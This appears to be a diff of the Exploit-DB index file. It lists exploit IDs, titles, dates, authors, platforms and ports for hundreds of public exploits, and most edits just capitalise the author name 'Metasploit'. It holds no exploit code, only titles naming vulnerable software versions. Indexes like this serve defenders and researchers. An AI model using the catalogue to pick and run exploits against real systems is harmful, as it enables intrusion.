+16820,platforms/windows/remote/16820.rb,"Exchange 2000 - XEXCH50 Heap Overflow (MS03-046)",2010-11-11,Metasploit,windows,remote,25 +16821,platforms/windows/remote/16821.rb,"Mercury Mail SMTP AUTH CRAM-MD5 - Buffer Overflow",2010-06-22,Metasploit,windows,remote,25 +16822,platforms/windows/remote/16822.rb,"TABS MailCarrier 2.51 - SMTP EHLO Overflow",2010-04-30,Metasploit,windows,remote,25 +16823,platforms/windows/remote/16823.rb,"Network Associates PGP KeyServer 7 LDAP Buffer Overflow",2010-11-14,Metasploit,windows,remote,389 +16824,platforms/windows/remote/16824.rb,"IMail LDAP Service Buffer Overflow",2010-04-30,Metasploit,windows,remote,389 +16825,platforms/windows/remote/16825.rb,"CA CAM log_security() Stack Buffer Overflow (Win32)",2010-09-20,Metasploit,windows,remote,0 +16826,platforms/windows/remote/16826.rb,"Symantec Alert Management System Intel Alert Originator Service Buffer Overflow",2010-05-13,Metasploit,windows,remote,38292 +16827,platforms/windows/remote/16827.rb,"Trend Micro ServerProtect 5.58 - Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16828,platforms/windows/remote/16828.rb,"Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16829,platforms/windows/remote/16829.rb,"Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 +16830,platforms/windows/remote/16830.rb,"Symantec Remote Management Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16831,platforms/windows/remote/16831.rb,"SafeNet SoftRemote IKE Service Buffer Overflow",2010-06-22,Metasploit,windows,remote,62514 +16832,platforms/netware/remote/16832.rb,"Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow",2010-05-09,Metasploit,netware,remote,0 +16833,platforms/netware/remote/16833.rb,"NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow",2010-11-14,Metasploit,netware,remote,111 +16834,platforms/linux/remote/16834.rb,"Snort Back Orifice - Pre-Preprocessor Remote Exploit",2010-07-03,Metasploit,linux,remote,0 +16835,platforms/linux/remote/16835.rb,"Madwifi SIOCGIWSCAN Buffer Overflow",2010-09-20,Metasploit,linux,remote,0 +16836,platforms/linux/remote/16836.rb,"Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow",2010-04-30,Metasploit,linux,remote,0 +16837,platforms/linux/remote/16837.rb,"hplip hpssd.py From Address Arbitrary Command Execution",2010-10-09,Metasploit,linux,remote,0 +16838,platforms/linux/remote/16838.rb,"NetSupport Manager Agent - Remote Buffer Overflow (2)",2011-03-03,Metasploit,linux,remote,0 +16839,platforms/linux/remote/16839.rb,"Borland InterBase PWD_db_aliased() Buffer Overflow",2010-07-03,Metasploit,linux,remote,0 +16840,platforms/linux/remote/16840.rb,"Borland InterBase open_marker_file() Buffer Overflow",2010-07-03,Metasploit,linux,remote,0 +16841,platforms/linux/remote/16841.rb,"GLD (Greylisting Daemon) Postfix Buffer Overflow",2010-07-03,Metasploit,linux,remote,0 +16842,platforms/linux/remote/16842.rb,"LPRng - use_syslog Remote Format String",2010-07-03,Metasploit,linux,remote,0 +16843,platforms/linux/remote/16843.rb,"Borland InterBase jrd8_create_database() Buffer Overflow",2010-07-03,Metasploit,linux,remote,0 +16844,platforms/linux/remote/16844.rb,"Borland InterBase INET_connect() Buffer Overflow",2010-07-03,Metasploit,linux,remote,0 +16845,platforms/linux/remote/16845.rb,"Poptop - Negative Read Overflow",2010-11-23,Metasploit,linux,remote,0 +16846,platforms/linux/remote/16846.rb,"UoW IMAP server LSUB Buffer Overflow",2010-03-26,Metasploit,linux,remote,0 +16847,platforms/linux/remote/16847.rb,"Squid NTLM Authenticate Overflow",2010-04-30,Metasploit,linux,remote,0 +16848,platforms/linux/remote/16848.rb,"Unreal Tournament 2004 - 'secure' Overflow (Linux)",2010-09-20,Metasploit,linux,remote,0 +16849,platforms/linux/remote/16849.rb,"MySQL yaSSL - SSL Hello Message Buffer Overflow (Linux)",2010-05-09,Metasploit,linux,remote,0 +16850,platforms/linux/remote/16850.rb,"MySQL yaSSL CertDecoder::GetName Buffer Overflow",2010-04-30,Metasploit,linux,remote,0 +16851,platforms/linux/remote/16851.rb,"ProFTPD 1.3.2rc3 < 1.3.3b - Telnet IAC Buffer Overflow (Linux)",2011-01-09,Metasploit,linux,remote,0 +16852,platforms/linux/remote/16852.rb,"ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)",2011-01-09,Metasploit,linux,remote,0 +16853,platforms/linux/remote/16853.rb,"Berlios GPSD Format String",2010-04-30,Metasploit,linux,remote,0 +16854,platforms/hardware/remote/16854.rb,"Linksys WRT54 Access Point apply.cgi Buffer Overflow",2010-09-24,Metasploit,hardware,remote,0 +16855,platforms/linux/remote/16855.rb,"PeerCast <= 0.1216 URL Handling Buffer Overflow (linux)",2010-09-20,Metasploit,linux,remote,0 +16856,platforms/cgi/webapps/16856.rb,"DD-WRT HTTP Daemon Arbitrary Command Execution",2010-07-07,Metasploit,cgi,webapps,0 +16857,platforms/cgi/webapps/16857.rb,"Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution",2010-10-05,Metasploit,cgi,webapps,0 +16858,platforms/php/webapps/16858.rb,"RedHat Piranha Virtual Server Package passwd.php3 - Arbitrary Command Execution",2010-10-18,Metasploit,php,webapps,0 +16859,platforms/linux/remote/16859.rb,"Samba lsa_io_trans_names Heap Overflow (Linux)",2010-07-14,Metasploit,linux,remote,0 +16860,platforms/linux/remote/16860.rb,"Samba chain_reply Memory Corruption (Linux x86)",2010-09-04,Metasploit,linux,remote,0 +16861,platforms/linux/remote/16861.rb,"Samba - trans2open Overflow (Linux x86)",2010-07-14,Metasploit,linux,remote,0 +16862,platforms/hardware/remote/16862.rb,"iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (1)",2010-09-20,Metasploit,hardware,remote,0 +16863,platforms/osx/remote/16863.rb,"AppleFileServer LoginExt PathName Overflow",2010-09-20,Metasploit,osx,remote,0 +16864,platforms/osx/remote/16864.rb,"UFO: Alien Invasion IRC Client - Buffer Overflow Exploit (OSX)",2010-10-09,Metasploit,osx,remote,0 +16865,platforms/osx/remote/16865.rb,"Arkeia Backup Client Type 77 - Overflow (Mac OS X)",2010-05-09,Metasploit,osx,remote,0 +16866,platforms/unix/remote/16866.rb,"Safari Archive Metadata Command Execution",2010-09-20,Metasploit,unix,remote,0 +16867,platforms/osx/remote/16867.rb,"Apple OS X Software Update Command Execution",2010-09-20,Metasploit,osx,remote,0 +16868,platforms/hardware/remote/16868.rb,"iPhone MobileSafari LibTIFF - 'email' Buffer Overflow (2)",2010-09-20,Metasploit,hardware,remote,0 +16869,platforms/hardware/remote/16869.rb,"iPhone MobileMail LibTIFF Buffer Overflow",2010-09-20,Metasploit,hardware,remote,0 +16870,platforms/multiple/remote/16870.rb,"Mail.app Image Attachment Command Execution",2011-03-05,Metasploit,multiple,remote,0 +16871,platforms/osx/remote/16871.rb,"Mac OS X mDNSResponder UPnP Location Overflow",2011-01-08,Metasploit,osx,remote,0 +16872,platforms/osx/remote/16872.rb,"WebSTAR FTP Server USER Overflow",2010-09-20,Metasploit,osx,remote,0 +16873,platforms/osx/remote/16873.rb,"MacOS X QuickTime RTSP Content-Type Overflow",2010-10-09,Metasploit,osx,remote,0 +16874,platforms/osx/remote/16874.rb,"MacOS X EvoCam HTTP GET Buffer Overflow",2010-10-09,Metasploit,osx,remote,0 +16875,platforms/osx/remote/16875.rb,"Samba lsa_io_trans_names Heap Overflow (OSX)",2010-04-05,Metasploit,osx,remote,0 +16876,platforms/osx_ppc/remote/16876.rb,"Samba - trans2open Overflow (Mac OS X PPC)",2010-06-21,Metasploit,osx_ppc,remote,0 +16877,platforms/irix/remote/16877.rb,"Irix LPD tagprinter Command Execution",2010-10-06,Metasploit,irix,remote,0 +16878,platforms/linux/remote/16878.rb,"ProFTPD 1.3.2rc3 < 1.3.3b - Telnet IAC Buffer Overflow (FreeBSD)",2010-12-02,Metasploit,linux,remote,0 +16879,platforms/freebsd/remote/16879.rb,"XTACACSD <= 4.1.2 report() Buffer Overflow",2010-05-09,Metasploit,freebsd,remote,0 +16880,platforms/linux/remote/16880.rb,"Samba trans2open - Overflow (*BSD x86)",2010-06-17,Metasploit,linux,remote,0 +16881,platforms/php/webapps/16881.rb,"Cacti graph_view.php Remote Command Execution",2010-07-03,Metasploit,php,webapps,0 +16882,platforms/php/webapps/16882.rb,"PHP XML-RPC Arbitrary Code Execution",2010-07-25,Metasploit,php,webapps,0 +16883,platforms/php/webapps/16883.rb,"Simple PHP Blog <= 0.4.0 - Remote Command Execution",2010-07-25,Metasploit,php,webapps,0 +16885,platforms/php/webapps/16885.rb,"TikiWiki jhot Remote Command Execution",2010-07-25,Metasploit,php,webapps,0 +16886,platforms/cgi/webapps/16886.rb,"AWStats (6.4-6.5) migrate Remote Command Execution",2010-07-03,Metasploit,cgi,webapps,0 +16887,platforms/linux/remote/16887.rb,"HP Openview connectedNodes.ovpl Remote Command Execution",2010-07-03,Metasploit,linux,remote,0 +16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin command execution (SMTP)",2010-08-25,Metasploit,linux,remote,0 +16889,platforms/linux/webapps/16889.rb,"Redmine SCM Repository 0.9.x / 1.0.x - Arbitrary Command Execution",2011-01-08,Metasploit,linux,webapps,0 +16890,platforms/php/webapps/16890.rb,"phpBB viewtopic.php Arbitrary Code Execution",2010-07-03,Metasploit,php,webapps,0 +16891,platforms/cgi/webapps/16891.rb,"QuickTime Streaming Server parse_xml.cgi Remote Execution",2010-07-03,Metasploit,cgi,webapps,0 +16892,platforms/php/webapps/16892.rb,"TWiki History TWikiUsers rev Parameter Command Execution",2010-07-03,Metasploit,php,webapps,0 +16893,platforms/cgi/webapps/16893.rb,"Barracuda IMG.PL Remote Command Execution",2010-04-30,Metasploit,cgi,webapps,0 +16894,platforms/php/webapps/16894.rb,"TWiki Search Function Arbitrary Command Execution",2010-07-03,Metasploit,php,webapps,0 +16895,platforms/php/webapps/16895.rb,"WordPress cache_lastpostdate - Arbitrary Code Execution",2010-07-03,Metasploit,php,webapps,0 +16896,platforms/php/webapps/16896.rb,"vBulletin misc.php Template Name Arbitrary Code Execution",2010-07-25,Metasploit,php,webapps,0 +16897,platforms/php/webapps/16897.rb,"BASE - base_qry_common Remote File Include",2010-11-24,Metasploit,php,webapps,0 +16899,platforms/php/webapps/16899.rb,"osCommerce 2.2 - Arbitrary PHP Code Execution",2010-07-03,Metasploit,php,webapps,0 +16901,platforms/php/webapps/16901.rb,"PAJAX Remote Command Execution",2010-04-30,Metasploit,php,webapps,0 +16902,platforms/php/webapps/16902.rb,"CakePHP <= 1.3.5 - / 1.2.8 Cache Corruption Exploit",2011-01-14,Metasploit,php,webapps,0 +16903,platforms/php/remote/16903.rb,"OpenX banner-edit.php File Upload PHP Code Execution",2010-09-20,Metasploit,php,remote,0 +16904,platforms/php/webapps/16904.rb,"Trixbox CE 2.6.1 - langChoice PHP Local File Inclusion",2011-01-08,Metasploit,php,webapps,0 +16905,platforms/cgi/webapps/16905.rb,"AWStats (6.1-6.2) - configdir Remote Command Execution",2009-12-26,Metasploit,cgi,webapps,0 +16906,platforms/php/webapps/16906.rb,"Joomla 1.5.12 TinyBrowser File Upload Code Execution",2010-06-15,Metasploit,php,webapps,0 +16907,platforms/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet Command Execution",2010-07-01,Metasploit,hardware,webapps,0 +16908,platforms/cgi/webapps/16908.rb,"Nagios3 statuswml.cgi Ping Command Execution",2010-07-14,Metasploit,cgi,webapps,0 +16909,platforms/php/webapps/16909.rb,"Coppermine Photo Gallery <= 1.4.14 picEditor.php Command Execution",2010-07-03,Metasploit,php,webapps,0 +16910,platforms/linux/remote/16910.rb,"Mitel Audio and Web Conferencing - Command Injection",2011-01-08,Metasploit,linux,remote,0 +16911,platforms/php/webapps/16911.rb,"TikiWiki tiki-graph_formula Remote PHP Code Execution",2010-09-20,Metasploit,php,webapps,0 +16912,platforms/php/webapps/16912.rb,"Mambo - Cache_Lite Class mosConfig_absolute_path Remote File Include",2010-11-24,Metasploit,php,webapps,0 +16913,platforms/php/webapps/16913.rb,"phpMyAdmin - Config File Code Injection",2010-07-03,Metasploit,php,webapps,0 +16914,platforms/cgi/webapps/16914.rb,"Matt Wright guestbook.pl Arbitrary Command Execution",2010-07-03,Metasploit,cgi,webapps,0 +16915,platforms/linux/remote/16915.rb,"Oracle VM Server Virtual Server Agent Command Injection",2010-10-25,Metasploit,linux,remote,0 +16916,platforms/linux/remote/16916.rb,"Citrix Access Gateway - Command Execution",2011-03-03,Metasploit,linux,remote,0 +16917,platforms/php/webapps/16917.rb,"Dogfood CRM spell.php Remote Command Execution",2010-07-03,Metasploit,php,webapps,0 +16918,platforms/freebsd/remote/16918.rb,"Zabbix Agent net.tcp.listen Command Injection",2010-07-03,Metasploit,freebsd,remote,0 +16919,platforms/linux/remote/16919.rb,"DistCC Daemon Command Execution",2010-07-03,Metasploit,linux,remote,0 +16920,platforms/linux/remote/16920.rb,"SpamAssassin spamd Remote Command Execution",2010-04-30,Metasploit,linux,remote,0 +16921,platforms/linux/remote/16921.rb,"ProFTPD-1.3.3c - Backdoor Command Execution",2010-12-03,Metasploit,linux,remote,0 +16922,platforms/linux/remote/16922.rb,"UnrealIRCD 3.2.8.1 - Backdoor Command Execution",2010-12-05,Metasploit,linux,remote,0 +16923,platforms/hardware/webapps/16923.rb,"ContentKeeper Web Remote Command Execution",2010-10-09,Metasploit,hardware,webapps,0 +16924,platforms/linux/remote/16924.rb,"ClamAV Milter Blackhole-Mode Remote Code Execution",2010-10-09,Metasploit,linux,remote,0 +16925,platforms/linux/remote/16925.rb,"Exim4 <= 4.69 - string_format Function Heap Buffer Overflow",2010-12-16,Metasploit,linux,remote,0 +16926,platforms/windows/remote/16926.rb,"Mercantec SoftCart CGI Overflow",2010-09-20,Metasploit,windows,remote,0 +16927,platforms/hp-ux/remote/16927.rb,"HP-UX LPD Command Execution",2010-10-06,Metasploit,hp-ux,remote,0 +16928,platforms/linux/remote/16928.rb,"System V Derived /bin/login Extraneous Arguments Buffer Overflow",2010-07-03,Metasploit,linux,remote,0 +16929,platforms/aix/dos/16929.rb,"AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 - Buffer Overflow",2010-11-11,Metasploit,aix,dos,0 +16930,platforms/aix/remote/16930.rb,"ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)",2010-11-11,Metasploit,aix,remote,0 16931,platforms/php/webapps/16931.html,"N-13 News 4.0 - CSRF (Add Admin)",2011-03-06,"AtT4CKxT3rR0r1ST ",php,webapps,0 16946,platforms/php/webapps/16946.txt,"RuubikCMS 1.0.3 - Multiple Vulnerabilities",2011-03-08,"Khashayar Fereidani",php,webapps,0 16933,platforms/php/webapps/16933.txt,"Quick Polls Local File Inclusion and Deletion Vulnerabilities",2011-03-06,"Mark Stanislav",php,webapps,0 @@ -14752,19 +14752,19 @@ id,file,description,date,author,platform,type,port 16953,platforms/asp/webapps/16953.txt,"Luch Web Designer Multiple SQL Injection Vulnerabilities",2011-03-10,p0pc0rn,asp,webapps,0 16954,platforms/php/webapps/16954.txt,"Keynect Ecommerce SQL Injection",2011-03-10,"Arturo Zamora",php,webapps,0 16955,platforms/asp/webapps/16955.txt,"SmarterMail 7.3 & 7.4 - Multiple Vulnerabilities",2011-03-10,"Hoyt LLC Research",asp,webapps,0 -16956,platforms/windows/remote/16956.rb,"Novell iPrint Client ActiveX Control <= 5.52 - Buffer Overflow",2011-03-07,metasploit,windows,remote,0 -16957,platforms/windows/remote/16957.rb,"Oracle MySQL for Microsoft Windows Payload Execution",2011-03-08,metasploit,windows,remote,0 +16956,platforms/windows/remote/16956.rb,"Novell iPrint Client ActiveX Control <= 5.52 - Buffer Overflow",2011-03-07,Metasploit,windows,remote,0 +16957,platforms/windows/remote/16957.rb,"Oracle MySQL for Microsoft Windows Payload Execution",2011-03-08,Metasploit,windows,remote,0 16959,platforms/multiple/webapps/16959.txt,"Oracle WebLogic Session Fixation Via HTTP POST",2011-03-11,"Roberto Suggi Liverani",multiple,webapps,0 16960,platforms/linux/dos/16960.txt,"Linux NTP query client 4.2.6p1 - Heap Overflow",2011-03-11,mr_me,linux,dos,0 16961,platforms/php/webapps/16961.py,"N_CMS 1.1E Pre-Auth - Local File Inclusion Remote Code Exploit",2011-03-11,TecR0c,php,webapps,0 16962,platforms/asp/webapps/16962.txt,"SmarterStats 6.0 - Multiple Vulnerabilities",2011-03-11,"Hoyt LLC Research",asp,webapps,0 16963,platforms/php/webapps/16963.txt,"Constructr CMS 3.03 Miltiple Remote Vulnerabilities",2011-03-11,LiquidWorm,php,webapps,0 -16964,platforms/unix/remote/16964.rb,"Accellion File Transfer Appliance MPIPE2 Command Execution",2011-03-11,metasploit,unix,remote,8812 +16964,platforms/unix/remote/16964.rb,"Accellion File Transfer Appliance MPIPE2 Command Execution",2011-03-11,Metasploit,unix,remote,8812 16965,platforms/windows/local/16965.pl,"CoolZip 2.0 - zip Buffer Overflow Exploit",2011-03-12,"C4SS!0 G0M3S",windows,local,0 16966,platforms/linux/dos/16966.php,"PHP <= 5.3.6 - shmop_read() Integer Overflow DoS",2011-03-12,"Jose Carlos Norte",linux,dos,0 16968,platforms/php/webapps/16968.txt,"Cover Vision SQL Injection",2011-03-13,Egyptian.H4x0rz,php,webapps,0 16969,platforms/php/webapps/16969.txt,"Log1 CMS 2.0 - Multiple Vulnerabilities",2011-03-14,Aodrulez,php,webapps,0 -16970,platforms/windows/remote/16970.rb,"Kolibri <= 2.0 - HTTP Server HEAD Buffer Overflow",2011-08-03,metasploit,windows,remote,0 +16970,platforms/windows/remote/16970.rb,"Kolibri <= 2.0 - HTTP Server HEAD Buffer Overflow",2011-08-03,Metasploit,windows,remote,0 16971,platforms/windows/local/16971.py,"ABBS Audio Media Player Buffer Overflow Exploit (M3U/LST)",2011-03-14,Rh0,windows,local,0 16972,platforms/ios/remote/16972.txt,"iOS Checkview 1.1 - Directory Traversal",2011-03-14,kim@story,ios,remote,0 16973,platforms/linux/dos/16973.c,"Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT Leak Exploit",2011-03-14,prdelka,linux,dos,0 @@ -14772,24 +14772,24 @@ id,file,description,date,author,platform,type,port 16975,platforms/asp/webapps/16975.txt,"SmarterMail 8.0 - Multiple XSS Vulnerabilities",2011-03-14,"Hoyt LLC Research",asp,webapps,0 16976,platforms/windows/local/16976.pl,"ABBS Audio Media Player 3.0 - (.lst) Buffer Overflow Exploit (SEH)",2011-03-14,h1ch4m,windows,local,0 16977,platforms/windows/local/16977.pl,"ABBS Electronic Flash Cards 2.1 - (.fcd) Buffer Overflow Exploit",2011-03-14,h1ch4m,windows,local,0 -16978,platforms/windows/local/16978.rb,"Foxit PDF Reader 4.2 Javascript File Write",2011-03-14,metasploit,windows,local,0 +16978,platforms/windows/local/16978.rb,"Foxit PDF Reader 4.2 Javascript File Write",2011-03-14,Metasploit,windows,local,0 16979,platforms/windows/dos/16979.html,"Opera 11.01 NULL PTR Derefernce",2011-03-15,echo,windows,dos,0 16980,platforms/php/webapps/16980.py,"If-CMS 2.07 - Pre-Auth Local File Inclusion Exploit (1)",2011-03-15,TecR0c,php,webapps,0 16982,platforms/php/webapps/16982.txt,"lotuscms 3.0.3 - Multiple Vulnerabilities",2011-03-16,"High-Tech Bridge SA",php,webapps,0 -16984,platforms/windows/remote/16984.rb,"HP OpenView Performance Insight Server Backdoor Account Code Execution",2011-03-15,metasploit,windows,remote,0 -16985,platforms/multiple/remote/16985.rb,"Adobe ColdFusion - Directory Traversal",2011-03-16,metasploit,multiple,remote,0 +16984,platforms/windows/remote/16984.rb,"HP OpenView Performance Insight Server Backdoor Account Code Execution",2011-03-15,Metasploit,windows,remote,0 +16985,platforms/multiple/remote/16985.rb,"Adobe ColdFusion - Directory Traversal",2011-03-16,Metasploit,multiple,remote,0 16986,platforms/windows/dos/16986.py,"AVIPreview 0.26 Alpha Denial of Service",2011-03-16,BraniX,windows,dos,0 16987,platforms/php/webapps/16987.txt,"pointter php content management system 1.2 - Multiple Vulnerabilities",2011-03-16,LiquidWorm,php,webapps,0 16988,platforms/php/webapps/16988.txt,"WikiWig 5.01 - Multiple XSS Vulnerabilities",2011-03-16,"AutoSec Tools",php,webapps,0 16989,platforms/php/webapps/16989.txt,"b2evolution 4.0.3 Persistent XSS",2011-03-16,"AutoSec Tools",php,webapps,0 -16990,platforms/multiple/remote/16990.rb,"Sun Java Applet2ClassLoader - Remote Code Execution Exploit",2011-03-16,metasploit,multiple,remote,0 +16990,platforms/multiple/remote/16990.rb,"Sun Java Applet2ClassLoader - Remote Code Execution Exploit",2011-03-16,Metasploit,multiple,remote,0 16991,platforms/windows/local/16991.txt,"Microsoft Source Code Analyzer for SQL Injection 1.3 - Improper Permissions",2011-03-17,LiquidWorm,windows,local,0 16992,platforms/php/webapps/16992.txt,"Joomla! 1.6 - Multiple SQL Injection Vulnerabilities",2011-03-17,"Aung Khant",php,webapps,0 16993,platforms/hardware/remote/16993.pl,"ACTi ASOC 2200 Web Configurator <= 2.6 - Remote Root Command Execution",2011-03-17,"Todor Donev",hardware,remote,0 16995,platforms/php/webapps/16995.txt,"Joomla com_booklibrary - SQL Injection",2011-03-17,"Marc Doudiet",php,webapps,0 16996,platforms/windows/dos/16996.rb,"Fake Webcam 6.1 - Local Crash PoC",2011-03-17,"Anastasios Monachos",windows,dos,0 16997,platforms/php/webapps/16997.txt,"Tugux CMS 1.0_final - Multiple Vulnerabilities",2011-03-17,Aodrulez,php,webapps,0 -16998,platforms/windows/remote/16998.rb,"RealNetworks RealPlayer CDDA URI Initialization",2011-03-17,metasploit,windows,remote,0 +16998,platforms/windows/remote/16998.rb,"RealNetworks RealPlayer CDDA URI Initialization",2011-03-17,Metasploit,windows,remote,0 16999,platforms/windows/local/16999.rb,"POP Peeper 3.7 SEH Exploit",2011-03-18,"Anastasios Monachos",windows,local,0 17000,platforms/php/webapps/17000.txt,"Tugux CMS (nid) BLIND SQL Injection",2011-03-18,eidelweiss,php,webapps,0 17001,platforms/windows/local/17001.pl,"CORE Multimedia Suite 2011 CORE Player 2.4 - Buffer Overflow (.m3u)",2011-03-18,Rh0,windows,local,0 @@ -14815,36 +14815,36 @@ id,file,description,date,author,platform,type,port 17024,platforms/windows/remote/17024.txt,"7-technologies igss 9.00.00.11059 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,remote,0 17025,platforms/windows/dos/17025.txt,"DATAC RealWin - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,dos,0 17026,platforms/windows/webapps/17026.txt,"Symantec LiveUpdate Administrator Management GUI HTML Injection",2011-03-23,"Nikolas Sotiriu",windows,webapps,0 -17027,platforms/windows/remote/17027.rb,"Adobe Flash Player AVM Bytecode Verification",2011-03-23,metasploit,windows,remote,0 -17028,platforms/windows/remote/17028.rb,"HP OpenView NNM nnmRptConfig nameParams Buffer Overflow",2011-03-23,metasploit,windows,remote,0 -17029,platforms/windows/remote/17029.rb,"HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow",2011-03-23,metasploit,windows,remote,0 -17030,platforms/windows/remote/17030.rb,"HP NNM CGI webappmon.exe execvp Buffer Overflow",2011-03-23,metasploit,windows,remote,0 -17031,platforms/linux/remote/17031.rb,"Distributed Ruby send syscall",2011-03-23,metasploit,linux,remote,0 +17027,platforms/windows/remote/17027.rb,"Adobe Flash Player AVM Bytecode Verification",2011-03-23,Metasploit,windows,remote,0 +17028,platforms/windows/remote/17028.rb,"HP OpenView NNM nnmRptConfig nameParams Buffer Overflow",2011-03-23,Metasploit,windows,remote,0 +17029,platforms/windows/remote/17029.rb,"HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow",2011-03-23,Metasploit,windows,remote,0 +17030,platforms/windows/remote/17030.rb,"HP NNM CGI webappmon.exe execvp Buffer Overflow",2011-03-23,Metasploit,windows,remote,0 +17031,platforms/linux/remote/17031.rb,"Distributed Ruby send syscall",2011-03-23,Metasploit,linux,remote,0 17032,platforms/windows/dos/17032.txt,"VMCPlayer 1.0 - Denial of Service",2011-03-23,BraniX,windows,dos,0 17033,platforms/windows/dos/17033.py,"IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS",2011-03-23,"Jeremy Brown",windows,dos,0 17034,platforms/windows/remote/17034.py,"Progea Movicon 11 TCPUploadServer Remote Exploit",2011-03-23,"Jeremy Brown",windows,remote,0 17035,platforms/php/webapps/17035.pl,"Constructr CMS 3.03 - Arbitrary File Upload",2011-03-23,plucky,php,webapps,0 17036,platforms/asp/webapps/17036.txt,"Web Wiz Forum Injection",2011-03-23,eXeSoul,asp,webapps,0 -17037,platforms/windows/remote/17037.rb,"PostgreSQL for Microsoft Windows Payload Execution",2011-03-23,metasploit,windows,remote,0 -17038,platforms/windows/remote/17038.rb,"HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow",2011-03-24,metasploit,windows,remote,80 -17039,platforms/windows/remote/17039.rb,"HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow",2011-03-23,metasploit,windows,remote,80 -17040,platforms/windows/remote/17040.rb,"HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow",2011-03-24,metasploit,windows,remote,80 -17041,platforms/windows/remote/17041.rb,"HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow",2011-03-23,metasploit,windows,remote,80 -17042,platforms/windows/remote/17042.rb,"HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow",2011-03-24,metasploit,windows,remote,80 -17043,platforms/windows/remote/17043.rb,"HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow",2011-03-23,metasploit,windows,remote,0 -17044,platforms/windows/remote/17044.rb,"HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow",2011-03-23,metasploit,windows,remote,0 +17037,platforms/windows/remote/17037.rb,"PostgreSQL for Microsoft Windows Payload Execution",2011-03-23,Metasploit,windows,remote,0 +17038,platforms/windows/remote/17038.rb,"HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow",2011-03-24,Metasploit,windows,remote,80 +17039,platforms/windows/remote/17039.rb,"HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow",2011-03-23,Metasploit,windows,remote,80 +17040,platforms/windows/remote/17040.rb,"HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow",2011-03-24,Metasploit,windows,remote,80 +17041,platforms/windows/remote/17041.rb,"HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow",2011-03-23,Metasploit,windows,remote,80 +17042,platforms/windows/remote/17042.rb,"HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow",2011-03-24,Metasploit,windows,remote,80 +17043,platforms/windows/remote/17043.rb,"HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow",2011-03-23,Metasploit,windows,remote,0 +17044,platforms/windows/remote/17044.rb,"HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow",2011-03-23,Metasploit,windows,remote,0 17045,platforms/windows/dos/17045.py,"Avaya IP Office Manager 8.1 TFTP - DoS",2011-03-24,"Craig Freyman",windows,dos,69 17046,platforms/php/webapps/17046.txt,"syndeocms 2.8.02 - Multiple Vulnerabilities (2)",2011-03-24,"High-Tech Bridge SA",php,webapps,0 -17047,platforms/windows/remote/17047.rb,"HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow",2011-03-25,metasploit,windows,remote,0 -17048,platforms/windows/remote/17048.rb,"VLC - AMV Dangling Pointer",2011-03-26,metasploit,windows,remote,0 -17050,platforms/php/webapps/17050.txt,"Family Connections CMS 2.3.2 (POST) Stored XSS And XML Injection",2011-03-26,LiquidWorm,php,webapps,0 +17047,platforms/windows/remote/17047.rb,"HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow",2011-03-25,Metasploit,windows,remote,0 +17048,platforms/windows/remote/17048.rb,"VLC - AMV Dangling Pointer",2011-03-26,Metasploit,windows,remote,0 +17050,platforms/php/webapps/17050.txt,"Family Connections CMS 2.3.2 - (POST) Stored XSS And XML Injection",2011-03-26,LiquidWorm,php,webapps,0 17051,platforms/php/webapps/17051.txt,"SimplisCMS 1.0.3.0 - Multiple Vulnerabilities",2011-03-27,NassRawI,php,webapps,0 17053,platforms/windows/remote/17053.txt,"wodWebServer.NET 1.3.3 - Directory Traversal",2011-03-27,"AutoSec Tools",windows,remote,0 17054,platforms/php/webapps/17054.txt,"webedition CMS 6.1.0.2 - Multiple Vulnerabilities",2011-03-27,"AutoSec Tools",php,webapps,0 17055,platforms/php/webapps/17055.txt,"Honey Soft Web Solution - Multiple Vulnerabilities",2011-03-28,**RoAd_KiLlEr**,php,webapps,0 17056,platforms/php/webapps/17056.txt,"WordPress Plugin BackWPup - Remote and Local Code Execution",2011-03-28,"Sense of Security",php,webapps,0 17057,platforms/php/webapps/17057.txt,"webEdition CMS Local File Inclusion",2011-03-28,eidelweiss,php,webapps,0 -17058,platforms/linux/remote/17058.rb,"Distributed Ruby Send instance_eval/syscall Code Execution",2011-03-27,metasploit,linux,remote,0 +17058,platforms/linux/remote/17058.rb,"Distributed Ruby Send instance_eval/syscall Code Execution",2011-03-27,Metasploit,linux,remote,0 17061,platforms/php/webapps/17061.txt,"Andy's PHP Knowledgebase Project 0.95.4 - SQL Injection",2011-03-29,"AutoSec 